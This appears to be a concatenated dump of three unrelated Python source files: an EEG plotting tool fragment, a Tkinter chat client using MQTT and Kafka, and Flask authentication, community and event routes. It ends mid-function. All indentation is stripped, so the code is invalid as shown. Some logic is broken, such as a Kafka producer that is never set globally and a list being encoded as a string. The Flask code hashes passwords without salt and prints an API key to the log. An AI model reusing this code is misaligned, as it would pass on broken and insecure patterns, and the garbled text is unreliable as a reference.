markersColors = [ '#9E7448' , '#658049' , '#C03DC6' , '#945563' , '#194EB3' , '#718EB6' , '#B03C42' , '#C38591' , '#A2357B' , '#7569A2' , '#7E8DA2' , '#282760' , '#92C08A' , '#372F88' , '#7E3789' , '#768966' , '#A97C21' , '#ACB3C2' , '#1B7266' , '#40569E' , '#BCA4C4' , '#A8996A' , '#584539' , '#9B3F4B' , '#595F58' , '#53798E' , '#6C7183' , '#72AD71' , '#1EA041' , '#7DABBA' , '#24371B' , '#6F7122' , '#9D20B5' , '#593851' , '#9C1A2D' , '#AC57C5' , '#378B48' , '#4223B2' , '#75B32F' , '#B4664E' , '#2E6C85' , '#903EA9' , '#3ABD19' , '#9F6CC5' , '#C01619' , '#6FAD8D' , '#40C753' , '#7F6199' , '#23853D' , '#258816' , '#34518F' , '#4B168D' , '#8CBB95' , '#1B8036' , '#76959F' , '#A6759E' , '#A4C059' , '#498283' , '#A26F5C' , '#50BB35' , '#228796' , '#905A45' , '#AB3694' , '#1B8EBF' , '#92B96F' , '#4D6E4E' , '#701431' , '#5BC547' , '#37495C' , '#486E1B' , '#86449B' , '#B4B68E' , '#958115' , '#20415F' , '#214D4F' , '#2AA42C' , '#5E52B9' , '#178E39' , '#A5166D' , '#A49F79' , '#49C06A' , '#6D881B' , '#701A67' , '#9090AC' , '#377832' , '#51C53B' , '#B53936' , '#334C1D' , '#A147C5' , '#C2C628' , '#363265' , '#633AC5' , '#75AB9C' , '#333079' , '#4B2945' , '#773A57' , '#51B3B2' , '#84A598' , '#274B15' , '#BD4268']
xrange = self.a.get_xlim()
#print xrange
if self.markMaker != None:
#print "rangeToTake:", [float(x)*self.tsFactor for x in xrange]
gtkMarkerMarks = self.markMaker.getMarks(rangeToTake=[float(x)*self.tsFactor for x in xrange])
if self.trigManager != None:
#print "rangeToTake:", [float(x)*self.tsFactor for x in xrange]
trigs = self.trigManager.getMarks(rangeToTake=[float(x)*self.tsFactor for x in xrange])
try:
textSwitch=0
for i in trigs.keys():
for j in trigs[i]:
#print (j-self.timesOffset)/self.tsFactor
#if (j-self.timesOffset)/self.tsFactor>xrange[0] and (j-self.timesOffset)/self.tsFactor<xrange[1]:
#print (j-self.timesOffset)/self.tsFactor
try:
colorIdx=int(i[-3:])%97
except Exception,e:
colorIdx=0
self.a.axvline((j-self.timesOffset)/self.tsFactor, lw=2, alpha=0.5, color=markersColors[colorIdx])
self.a.text((j-self.timesOffset)/self.tsFactor,0+textSwitch*self.offset/2,i,fontsize=6)
textSwitch=textSwitch-1
except Exception, e:
#print "Keine Markers geladen..."
pass
try:
for tp in gtkMarkerMarks:
self.a.axvline((tp-self.timesOffset)/self.tsFactor, lw=2, alpha=0.5, color="#00937B")
except Exception, e:
#print "Keine Markers geladen..."
pass
# try:
# for tp in trigs:
# self.a.axvline((tp-self.timesOffset)/self.tsFactor, lw=1.5, alpha=0.5, color="#000000")
# except Exception, e:
# #print "Keine Markers geladen..."
# pass
def get_times(self):
#Zeiten umschreiben
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
self.ts = [(start-self.timesOffset+n*stride) for n in range(length)]
samplR = self.reader.samplRate
self.tsFactor = 1
if self.rbSecs.get_active(): # Sekunden
self.ts = [float(t)/samplR for t in self.ts]
self.tsFactor*=samplR
elif self.rbMins.get_active(): # Minuten
self.ts = [float(t)/(samplR*60.) for t in self.ts]
self.tsFactor*=samplR*60
elif self.rbHours.get_active(): # Stunden
self.ts = [float(t)/(samplR*3600.) for t in self.ts]
self.tsFactor*=samplR*3600
elif self.rbDays.get_active(): #Tage
self.ts = [float(t)/(samplR*86400.) for t in self.ts]
self.tsFactor*=samplR*86400
def main():
gtk.main()
return 0
if __name__ == "__main__":
if len(sys.argv)>1:
#print sys.argv[1], "wurde als Argument übergeben."
if os.path.exists(sys.argv[1]):
p = EEGPlot(sys.argv[1])
else:
p = EEGPlot()
else:
p = EEGPlot()
main() |
KafkaCli.py | import time
from tkinter import Tk, Toplevel, Label, CENTER, Entry, Button, Text, Scrollbar, \
DISABLED, END, NORMAL, LEFT, RIGHT, StringVar, BOTTOM, IntVar
import paho.mqtt.client as paho
from pykafka import KafkaClient
import threading
# Variaveis relacionadas ao MQTT
client = ''
username = ''
topic = "geral" # Topico onde os clientes irão se conectar
broker = "localhost"
port = 1883
# Variaveis relacionadas ao Kafka
kafka_client = ''
kafka_topic = ''
kafka_producer = ''
# Variaveis utilizadas
flag = 0 # Usada apenas para algumas verificações
msg = [] # [Destino, Source, Mensagem, isGroup]
message = "" # Mensagem que deseja ser enviada
block = [] # Lista de bloqueados
grpName = "" # Nome do grupo
groups = [] # Lista de grupos que fui inserido
etry = ""
msgToSend = 0
newMessages = []
LOGIN_WIDTH = 400
LOGIN_HEIGHT = 300
CHAT_WIDTH = 800
CHAT_HEIGHT = 500
class interface:
dst = [] # Destino da mensagem
msgToSend = 0
def __init__(self):
# chat window which is currently hidden
self.Window = Tk()
self.Window.withdraw()
# login window
self.login = Toplevel()
# set the title
self.login.title("Login")
self.login.resizable(width=False,
height=False)
self.login.configure(width=LOGIN_WIDTH,
height=LOGIN_HEIGHT)
# create a Label
self.pls = Label(self.login,
text="Por Favor Digite seu Nome",
justify=CENTER,
font="Helvetica 14 bold")
self.pls.place(relheight=0.15,
relx=0.2,
rely=0.07)
# create a Label
self.labelName = Label(self.login,
text="Username: ",
font="Helvetica 12")
self.labelName.place(relheight=0.2,
relx=0.1,
rely=0.2)
# create a entry box for
# tyoing the message
self.entryName = Entry(self.login,
font="Helvetica 14")
self.entryName.place(relwidth=0.4,
relheight=0.12,
relx=0.35,
rely=0.2)
# set the focus of the cursor
self.entryName.focus()
# create a Continue Button
# along with action
self.go = Button(self.login,
text="Login",
font="Helvetica 14",
command=lambda: self.goAhead(self.entryName.get()))
self.go.place(relx=0.4,
rely=0.55)
self.buttonPos = 0
self.listContacts = [] # Usado para adicionar pessoas nos grupos
self.Window.mainloop()
def goAhead(self, name):
self.login.destroy()
global username
global client
username = name
client = paho.Client(username)
client.on_subscribe = on_subscribe
client.on_unsubscribe = on_unsubscribe
client.on_connect = on_connect
client.on_message = self.on_message
client.connect(broker, port)
client.loop_start()
client.subscribe(topic)
kafka_client = KafkaClient(hosts="localhost:9092")
kafka_topic = kafka_client.topics[topic]
kafka_producer = kafka_topic.get_sync_producer()
self.layout(name)
def layout(self, name):
self.name = name
# to show chat window
self.Window.deiconify()
self.Window.title("XasUP APP")
self.Window.resizable(width=False,
height=False)
self.Window.configure(width=CHAT_WIDTH,
height=CHAT_HEIGHT,
bg="#17202A")
self.labelHead = Label(self.Window,
bg="#17202A",
fg="#EAECEE",
text=self.name,
font="Helvetica 13 bold",
pady=5)
self.labelHead.place(relwidth=0.7)
self.buttonMsgAddGroup = Button(self.Window,
text="Add Group",
font="Helvetica 8 bold",
width=20,
bg="#ABB2B9",
command=lambda: self.creategroup())
self.buttonMsgAddGroup.place(relx=0.7,
# rely=0.05,
relheight=0.1,
relwidth=0.1)
self.buttonMsgAddContact = Button(self.Window,
text="Add Contato",
font="Helvetica 8 bold",
width=20,
bg="#ABB2B9",
command=lambda: self.personContact())
self.buttonMsgAddContact.place(relx=0.8,
# rely=0.05,
relheight=0.1,
relwidth=0.1)
self.buttonMsgBlockContat = Button(self.Window,
text="Bloquear",
font="Helvetica 8 bold",
width=20,
bg="#ABB2B9",
command=lambda: self.getContact(self.dst, 2))
self.buttonMsgBlockContat.place(relx=0.9,
# rely=0.05,
relheight=0.1,
relwidth=0.1)
self.line = Label(self.Window,
width=450,
bg="#ABB2B9")
self.line.place(relwidth=0.7,
rely=0.07,
relheight=0.012)
global textCons
self.textCons = Text(self.Window,
width=10,
height=2,
bg="#17202A",
fg="#EAECEE",
font="Helvetica 10",
padx=5,
pady=5)
self.textCons.place(relheight=0.745,
relwidth=0.7,
rely=0.08)
self.labelBottom = Label(self.Window,
bg="#ABB2B9",
height=80)
self.labelBottom.place(relwidth=0.7,
rely=0.825)
self.entryMsg = Entry(self.labelBottom,
bg="#2C3E50",
fg="#EAECEE",
font="Helvetica 13")
# place the given widget
# into the gui window
self.entryMsg.place(relwidth=0.74,
relheight=0.06,
rely=0.008,
relx=0.011)
self.entryMsg.focus()
# create a Send Button
self.buttonMsg = Button(self.labelBottom,
text="Send",
font="Helvetica 10 bold",
width=20,
bg="#ABB2B9",
command=lambda: self.sendButton(self.entryMsg.get()))
self.buttonMsg.place(relx=0.77,
rely=0.008,
relheight=0.06,
relwidth=0.22)
self.textCons.config(cursor="arrow")
# create a scroll bar
scrollbar = Scrollbar(self.textCons)
# place the scroll bar
# into the gui window
scrollbar.place(relheight=1,
relx=0.974)
scrollbar.config(command=self.textCons.yview)
self.textCons.config(state=DISABLED)
def creategroup(self):
groupname = StringVar()
top = Toplevel(self.Window)
label1 = Label(top, text="Insira nome do grupo")
label1.pack(side=LEFT)
entry = Entry(top, bd=5)
entry.pack(side=LEFT)
button = Button(top, text="Confirmar",
command=lambda: groupname.set(entry.get()))
button.pack(side=LEFT)
button.wait_variable(groupname)
print(groupname.get())
top.destroy()
self.addContactGroup()
self.createButtonGroup(groupname.get())
def addContactGroup(self):
exit = IntVar()
top = Toplevel(self.Window)
label1 = Label(top, text="Digite um contato para inserir no grupo")
label1.pack(side=LEFT)
entry = Entry(top, bd=5)
entry.pack(side=LEFT)
button1 = Button(top, text="Adicionar",
command=lambda: self.checkContact(entry.get()))
button1.pack(side=LEFT)
button2 = Button(top, text="Sair",
command=lambda: exit.set(1))
button2.pack(side=LEFT)
button2.wait_variable(exit)
top.destroy()
def checkContact(self, contact):
print(self.listContacts)
if not self.listContacts:
print("Criação de um grupo invalido! Crie um contato.")
else:
for i in self.listContacts:
if contact == i:
print("Nome cadastrado")
else:
print("Contato não existente")
def personContact(self):
personname = StringVar()
top = Toplevel(self.Window)
label1 = Label(top, text="Insira nome do contato")
label1.pack(side=LEFT)
entry = Entry(top, bd=5)
entry.pack(side=LEFT)
button = Button(top, text="Confirmar",
command=lambda: personname.set(entry.get()))
button.pack(side=LEFT)
button.wait_variable(personname)
self.listContacts.append(personname.get())
top.destroy()
self.createPersonContact(personname.get())
def createButtonGroup(self, groupname):
self.buttonPos += 0.1
self.buttonMsg12347 = Button(self.Window,
text="Grupo " + groupname,
font="Helvetica 8 bold",
width=20,
bg="#ABB2B9",
command=lambda: self.getContact(groupname, 1))
self.buttonMsg12347.place(relx=0.7,
rely=self.buttonPos,
relheight=0.1,
relwidth=0.3)
def createPersonContact(self, nameperson):
self.buttonPos += 0.1
self.buttonMsg12347 = Button(self.Window,
text=nameperson,
font="Helvetica 8 bold",
width=20,
bg="#ABB2B9",
command=lambda: self.getContact(nameperson, 0))
self.buttonMsg12347.place(relx=0.7,
rely=self.buttonPos,
relheight=0.1,
relwidth=0.3)
def getContact(self, nameperson, isGrp):
flag = 0
self.textCons.config(state=NORMAL)
self.textCons.delete(1.0, END)
self.textCons.config(state=DISABLED)
self.textCons.see(END)
if newMessages:
x = 0
for i in range(len(newMessages)):
if nameperson == newMessages[i][0]:
auxMsg = "{}: {}\n".format(newMessages[i][0], newMessages[i][1])
self.printMsg(auxMsg)
x += 1
self.buttonMsg12347.configure(text=f'{nameperson}')
for i in range(x):
newMessages.pop(0)
if isGrp == 0:
self.dst = nameperson
self.msgToSend = 0
print("is person")
elif isGrp == 1:
self.dst = nameperson
self.msgToSend = 1
print("is group")
elif isGrp == 2:
for i in range(len(block)):
if self.dst == block[i]:
block.remove(self.dst)
flag = 1
if flag == 0:
block.append(nameperson)
def sendButton(self, msg):
self.textCons.config(state=DISABLED)
self.msg = msg
self.entryMsg.delete(0, END)
snd = threading.Thread(target=self.on_publish())
snd.start()
def printMsg(self, msg):
self.textCons.config(state=NORMAL)
self.textCons.insert(END, msg)
self.textCons.config(state=DISABLED)
self.textCons.see(END)
def on_message(self, client, userdata, message):
flag = 0
aux = 0
# Verifica se é uma mensagem para um grupo ou não
# Divide a mensagem para tratar ela de forma correta
msg = message.payload.decode("utf-8").split(
".") # Necessario converter para utf-8, caso contrario a mensagem estará em binário
# Verifica se é uma mensagem para um grupo ou não
kafka_producer.produce(msg.encode('ascii'))
if str(msg[1]) != username:
if str(msg[3]) == '0':
# Verifica se a mensagem é diretamente para meu username
if str(msg[0]) == username:
# Verifico se o usuario está bloqueado ou não
for i in range(len(block)):
# Caso esteja, não recebo a mensagem, apenas ignoro
if block[i] == str(msg[1]):
print("Quem enviou esta na lista de bloqueados")
flag = 1
break
i += 1
if flag == 0:
if self.dst != str(msg[1]): # Se mensagem != destino selecionado -> Envia apenas recebida
for i in range(len(newMessages)):
if str(msg[1]) == newMessages[i][0]:
aux += 1
newMessages.append([str(msg[1]), str(msg[2]), aux])
self.buttonMsg12347.configure(text=f'{str(msg[1])} \t {aux+1}')
# Usar um vetor com as mensagens recebidas -> Manda um lida e tira as mensagens do vetor
else:
aux = "{}: {}\n".format(str(msg[1]), str(msg[2]))
interface.printMsg(self, aux)
else:
print("Msg n é para mim")
else:
for i in range(len(groups)):
if str(msg[0]) == groups[i]:
aux = "Grupo {}- > {}: {} \n\n".format(
str(msg[0]), str(msg[1]), str(msg[2]))
interface.printMsg(self, aux)
flag = 1
i += 1
if flag == 0:
x = []
aux = ""
# Recebemos do MQTT o vetor como string, é necessario repassar para vetor novamente
for i in msg[3]:
# Indicativos de string
if i == '[' or i == "'" or i == " ":
pass
else:
# Final do "vetor" e de um novo nome, então podemos adicionar ao novo vetor auxiliar
if i == "," or i == "]":
x.append(aux)
aux = ""
else:
aux += i
print(aux)
print(x)
for i in x:
if i == username:
groups.append(str(msg[0]))
aux = "Adicionado em um novo grupo -> {} \n".format(str(msg[0]))
interface.printMsg(self, aux)
self.createButtonGroup(str(msg[0]))
else:
print("Nao estou no grupo")
# Necessario alterar a logica para um melhor funcionamento no front end
def on_publish(self):
flag = 0
# Verifica se a mensagem será enviada para um unico cliente ou para um grupo
# Flag para verificar se é grupo ou não
if self.msgToSend == 0:
message = self.msg
# Monta a estrutura da mensagem, onde irá conter [Destino, Source, Mensagem, Se é para um grupo ou não]
aux = "You: {} \n".format(message)
interface.printMsg(self, aux)
msg = "{}.{}.{}.0".format(self.dst, username, message)
client.publish(topic, msg) # Publica a mensagem no topico desejado
aux = str(time.strftime("Mensagem Recebida: " + '%B %d, %Y' + ' at ' + '%I:%M %p \n'))
interface.printMsg(self, aux)
aux = str(time.strftime("Mensagem Lida: " + '%B %d, %Y' + ' at ' + '%I:%M %p \n'))
interface.printMsg(self, aux)
elif self.msgToSend == 1:
grpName = self.dst # Nome do grupo que está selecionado
for i in range(len(groups)):
if grpName == groups[i]:
message = self.msg
# Monta a estrutura da mensagem quando é um grupo -> [Destino, Source, Mensagem, Se é para um grupo ou não]
aux = "You: {} \n".format(message)
interface.printMsg(self, aux)
# Destino será o nome do grupo
msg = "{}.{}.{}.1".format(grpName, username, message)
flag = 1
client.publish(topic, msg)
i += 1
if flag == 0:
# Caso o nome do grupo não exista, é necessario criar o novo grupo
groups.append(grpName)
message = self.msg
aux = "You: {} \n".format(message)
interface.printMsg(self, aux)
# Destino será o nome do grupo
msg = "{}.{}.{}.{}".format(
grpName, username, message, self.listContacts)
client.publish("geral", str(msg))
def on_connect(client, userdata, message, rc):
print("Connected - rc: ", rc)
def on_subscribe(client, userdata, mid, granted_qos):
# Verificar envio de pacote para todos conectados
# append quando alguem se conectar
print("{} se conectou".format(username))
def on_unsubscribe():
# Necessario alterar a lista de conectados
print("{} se desconectou".format(username))
i = interface()
|
general.py | from flask import (
Blueprint,
render_template,
request,
jsonify,
make_response
)
# Templates folder and static_folder are for auth routes
general_bp = Blueprint('general_bp',
__name__,
template_folder='templates',
static_folder='static',)
from app import db
from dryFunctions import *
from models import (
Users,
Communities,
CommunityMembers
)
## Imports for Auth Routes
from flask import flash
import threading
from os import environ
from models import BlackListedTokens
sg_api = environ.get('SG_API')
## Putting all Auth Routes untill the issue is resolved!
@general_bp.route('/register/user', methods=['POST'])
def user_registration():
print('\n\n\n')
print(str(request.json))
print('\n\n\n')
userName = request.json.get('userName')
userEmail = request.json.get('userEmail')
userPassword = request.json.get('userPassword')
userPasswordConfirm = request.json.get('userPasswordConfirm')
if find_missing(userName, userEmail, userPassword, userPasswordConfirm):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Missing Params'
}
elif userPassword != userPasswordConfirm:
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Confirmation Password Different'
}
elif malformed_length(
{
userName: [3, 64],
userEmail: [3, 64],
userPassword: [3, 64]
}
):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Param Length is Bad'
}
elif user_exist(email=hex_hash(userEmail)):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'User Exist'
}
elif not is_email_valid(userEmail):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Email is not valid'
}
else:
try:
userEmailHash = hex_hash(userEmail)
userPasswordHash = hex_hash(userPassword)
new_user = Users(username=userName, email=userEmailHash, password=userPasswordHash)
db.session.add(new_user)
db.session.commit()
token = encode_auth_token(user_detail(userEmailHash).get('userId')).decode()
payLoad = {
'userName': userName,
'userEmail': userEmailHash,
'message': 'User Successfully Created',
'token': token
}
return make_response(jsonify(payLoad), 201)
except Exception as e:
print(str(e))
db.session.rollback()
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Something went wrong'
}
return make_response(jsonify(payLoad), 400)
@general_bp.route('/login/user', methods=['POST'])
def user_login():
userEmail = request.json.get('userEmail')
userPassword = request.json.get('userPassword')
rememberMe = request.json.get('rememberMe')
if find_missing(userEmail, userPassword, rememberMe):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Missing Params'
}
elif not user_exist(email=hex_hash(userEmail)):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'User Does not Exist'
}
else:
userEmailHash = hex_hash(userEmail)
userPasswordHash = hex_hash(userPassword)
user_object = user_detail(userEmailHash)
if (userPasswordHash == user_object.get('userPassword')):
token = encode_auth_token(user_object.get('userId'), remember_me=rememberMe).decode()
payLoad = {
'userName': user_object.get('userName'),
'userEmail': userEmailHash,
'message': 'Success LogIn',
'token': token
}
return make_response(jsonify(payLoad), 200)
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Password Mismatch'
}
return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/reset', methods=['POST'])
def forgot_password():
userEmail = request.json.get('userEmail')
if find_missing(userEmail):
payLoad = {
'userEmail': '',
'message': 'Missing Params'
}
elif malformed_length(
{
userEmail: [3, 64],
}
):
payLoad = {
'userEmail': '',
'message': 'Param Length is Bad'
}
elif not user_exist(email=hex_hash(userEmail)):
payLoad = {
"email": userEmail,
"message": "Make a Sign-up"
}
else:
userDetails = user_detail(email=hex_hash(userEmail))
userName = userDetails.get('userName')
passwordResetLink = "https://attendance2hosted.herokuapp.com/auth/password/update/" + \
encode_auth_token(user_id=userEmail, valid_minutes=5).decode()
templateId = "d-bca83b14b0f44357b6a78fe531249832"
url = "https://api.sendgrid.com/v3/mail/send"
print(sg_api)
email_header = {'Content-Type': 'application/json', "Authorization": sg_api}
email_body = {
"personalizations": [
{
"to": [
{
"email": userEmail
}
],
"dynamic_template_data": {
"userName": userName,
"passwordResetLink": passwordResetLink
}
}
],
"from": {
"email": "pchackers18@gmail.com"
},
"template_id": templateId
}
threading.Thread(target=send_email, args=(url, email_header, email_body)).start()
#send_email(url, email_header, email_body)
payLoad = {
"email": userEmail,
"message": "Check your email"
}
return make_response(jsonify(payLoad), 202)
return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/update/<emailHashToken>', methods=['GET', 'PATCH', 'POST'])
def password_updation(emailHashToken):
userEmail = decode_auth_token(emailHashToken)
if request.method=='POST':
if userEmail == 'Signature expired. Please log in again.':
flash('I suppose you are timed out')
return render_template('passwordReset.html') # Render to Home Page
elif userEmail == 'Invalid token. Please log in again.':
flash('Maybe Hackers love to play')
return render_template('passwordReset.html') # Render to Home Page
else:
userEmailHash = hex_hash(userEmail)
if not user_exist(userEmailHash):
flash('Firstly you should Create an Account')
return render_template('passwordReset.html') # Render to Home Page #--todo-- # Redirect to home page
userEmail = request.form.get('userEmail')
userPassword = request.form.get('userPassword')
userPasswordConfirm = request.form.get('userPasswordConfirm')
if malformed_length(
{
userEmail: [3, 64],
userPassword: [3, 64]
}
):
flash('Password length is Absurd')
return render_template('passwordReset.html')
elif user_detail(hex_hash(userEmail)).get('userEmail') != userEmailHash:
flash('Is this a Typo?')
return render_template('passwordReset.html')
else:
user = Users.query.filter_by(userEmail=userEmailHash).first()
user.userPassword = hex_hash(userPassword)
db.session.commit()
return render_template('passwordReset.html') #--todo-- # Redirect to home page
return render_template('passwordReset.html')
@general_bp.route('logout/user', methods=['GET'])
def logout_user():
token = request.headers.get('Authorization')
print(token)
if token:
if isBlackListed(token):
payLoad ={
"message": "logged-out-already"
}
elif malformed_length(
{
token: [3, 1024],
}
):
payLoad = {
'message': ['this-request-is-not-processed',
'length-constraint-applied'
]
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
"message": ["not-a-valid-request",
"try-login-first"]
}
else:
blackListed = BlackListedTokens(token=token)
db.session.add(blackListed)
db.session.commit()
payLoad = {
"message": "user-logged-out"
}
return make_response(jsonify(payLoad), 200)
payLoad = {
"message": "missing-token"
}
return make_response(jsonify(payLoad), 400)
########################################
# HomePage for Everyone
@general_bp.route('/', methods=['GET'])
def testing_route():
return "Working!!"
@general_bp.route('/community/create', methods=['POST'])
def create_community():
token = request.headers.get('Authorization')
communityName = request.json.get('communityName')
communityDescription = request.json.get('communityDescription')
if find_missing(token, communityName):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
communityName: [1, 64],
communityDescription: [0, 256]
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
# If a User creates a two community with same names then that's a problem
userId = decode_auth_token(token)
# User Exists or not shall be checked else sqlalchemy error if valid but false token is sended #--todo--
try:
comJoinToken = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first().joinToken
if comJoinToken != None:
payLoad = {
'message': ['choose-a-new-name',
'delete-older-community',
'same-community-name-exist']
}
return make_response(jsonify(payLoad), 400)
except Exception as e:
print(str(e))
community = Communities(userId, communityName, communityDescription)
db.session.add(community)
db.session.commit()
communityQuery = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first()
comJoinToken = communityQuery.joinToken
communityId = communityQuery.communityId
payLoad = {
'userId': userId,
'communityName': communityName,
'communityDescription': communityDescription,
'comJoinToken': comJoinToken,
'communityId': communityId,
'message': 'community-successfully-created'
}
return make_response(jsonify(payLoad), 201)
return make_response(jsonify(payLoad), 400)
@general_bp.route('/community/join', methods=['POST'])
def join_community():
token = request.headers.get('Authorization')
joinToken = request.json.get('joinToken')
if find_missing(token, joinToken):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
joinToken: [16, 32], # 22 exactly
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
userId = decode_auth_token(token)
comJoinToken = Communities.query.filter_by(joinToken=joinToken).first()
if comJoinToken == None:
payLoad = {
'message': 'incorrect-join-token'
}
return make_response(jsonify(payLoad), 400)
elif py_boolean(comJoinToken.joinTokenValid) == False:
payLoad = {
'message': 'community-joining-is-closed'
}
return make_response(jsonify(payLoad), 403)
communityId = comJoinToken.communityId
# user me join same community more than once
try:
userInCommunity = CommunityMembers.query.filter(CommunityMembers.userId==userId, CommunityMembers.communityId==communityId).first()
if userInCommunity != None:
payLoad = {
'message': 'you-are-already-in-this-community'
}
return make_response(jsonify(payLoad), 400)
except Exception as e:
print(str(e))
communityMember = CommunityMembers(userId, communityId)
db.session.add(communityMember)
db.session.commit()
payLoad = {
'userId': userId,
'communityId': communityId,
'message': 'community-successfully-joined'
}
return make_response(jsonify(payLoad), 200)
return make_response(jsonify(payLoad), 400)
# Set Event
@general_bp.route('/event/set', methods=['POST'])
def set_event():
"""
Endpoint to set an Event and put on hold if-
start now is false
Required: Admin
return: event hold status | auth fail
"""
token = request.headers.get('Authorization')
event_name_ = request.json.get('event_name')
event_description_ = request.json.get('event_description')
ending_time_delta_ = request.json.get('ending_time_delta')
location_range_ = request.json.get('location_range')
communityId_ = request.json.get('communityId') # How to get this is a creative part
latitude_ = request.json.get('latitude')
longitude_ = request.json.get('longitude')
broadcast_choice_ = request.json.get('broadcast_choice')
start_event_ = request.json.get('start_event') # New add_on
if find_missing(token, event_name_, ending_time_delta_, location_range_,
latitude_, longitude_, broadcast_choice_, start_event_, communityId_):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
token: [16, 1024],
event_name_: [3, 128],
event_description_: [0, 2048],
}
):
payLoad = {
'message': 'bad-length-params'
}
elif malformed_dtc(
{
ending_time_delta_: 'i',
location_range_: 'i',
latitude_: 'f',
longitude_: 'f',
ending_time_delta_: 'i',
location_range_: 'i',
communityId_: 'i'
}
):
payLoad = {
'message': 'bad-datatype'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
latitude_ = float(latitude_)
longitude_ = float(longitude_)
ending_time_delta_ = int(ending_time_delta_)
location_range_ = int(location_range_)
communityId_ = int(communityId_)
if py_boolean(broadcast_choice_):
broadcast_choice_ = 1
else:
broadcast_choice_ = 0
if py_boolean(start_event_):
start_event_ = 1
else:
start_event_ = 0
# check if user has that community registered under him/her and is Authorized
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
communityRegistered = [x.communityId for x in Communities.query.filter_by(userId=userId).all()]
if communityId_ not in communityRegistered:
payLoad = {
'message': 'You-Are-Not-Registered-as-Community-Head-for-this-company'
}
return make_response(jsonify(payLoad), 403)
# Getting OTP
otp_ = random_otp()
if otp_ == 'Fail':
payLoad = {
'message': 'OTP-Generation-Failed'
}
return make_response(jsonify(payLoad), 500)
creation_date_ = datetime.datetime.now()
if start_event_ == 1:
new_event = Events(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
latitude=latitude_, longitude=longitude_, broadcast_choice=broadcast_choice_, \
communityId=communityId_)
db.session.add(new_event)
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': True,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 200) # Object of type Response is not JSON serializable
else: # else add it in hold
new_hold = HoldedEvents(creation_date= creation_date_, userEmail=userEmail_, \
otp=otp_, event_name=event_name_, event_description=event_description_, \
ending_time_delta=ending_time_delta_, location_range=location_range_, \
broadcast_choice=broadcast_choice_, communityId=communityId_)
db.session.add(new_hold)
db.session.commit()
payLoad = {
'OTP': otp_,
'EventName': event_name_,
'EndingInMin': ending_time_delta_,
'CommunityId': communityId_,
'EventStarted': False,
'BroadcastChoice': broadcast_choice_,
'LocationValidInMeters': location_range_
}
return make_response(payLoad, 201) # Object of type Response is not JSON serializable
return make_response(payLoad, 400)
# Holded Events View
@general_bp.route('/event/holded', methods=['POST'])
def view_holded():
"""
Shows all holded events from here start event can be clicked
and then otp is passed dynamically to the start event
"""
token = request.headers.get('Authorization')
communityId_ = request.json.get('communityId') # Has to be passed
if find_missing(token, communityId_):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
token: [16, 1024], # 22 exactly
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
userId = decode_auth_token(token)
userEmail_ = Users.query.get(userId).userEmail
holdedEvents = HoldedEvents.query.filter(HoldedEvents.userEmail==userEmail_, HoldedEvents.communityId == communityId_).all()
holdedEventsArray = []
for event in holdedEvents:
adder = {
"holdId": event.holdId,
"CreationDate": event.creation_date, #--todo-- improve the format
"OTP":event.otp,
"EventName": event.event_name,
"EventDescription": event.event_description,
"LocationValidInMeters": event.location_range,
"EndingInMin": event.ending_time_delta,
"BroadcastChoice": event.broadcast_choice,
"CommunityId": event.communityId
}
holdedEventsArray.append(adder)
payLoad = holdedEventsArray
return make_response(jsonify(payLoad), 200)
return make_response(jsonify(payLoad), 400)
# Holded Event
@general_bp.route('/event/start/<otpNumber>', methods=['POST'])
def start_event(otpNumber):
"""
This will start the event those are present in holded events
Post Req: latitude, longitude, authToken
"""
token = request.headers.get('Authorization')
latitude_ = request.json.get('latitude')
longitude_ = request.json.get('longitude')
holdedQuery = HoldedEvents.query.filter_by(otp=otpNumber).first()
otp_check = holdedQuery
if otp_check in [None, '']: #does not exsists
payLoad = {
'Status': 'Fail',
'Reason': 'no-such-holded-event'
}
elif find_missing(token, latitude_, longitude_,):
payLoad = {
'message': 'missing-params',
'header': ['Authorization', ],
'body': ['latitude', 'longitude']
}
elif malformed_length(
{
token: [16, 1024],
}
):
payLoad = {
'message': 'bad-length-params'
}
elif malformed_dtc(
{
latitude_: 'f',
longitude_: 'f'
}
):
payLoad = {
'message': 'bad-datatype'
}
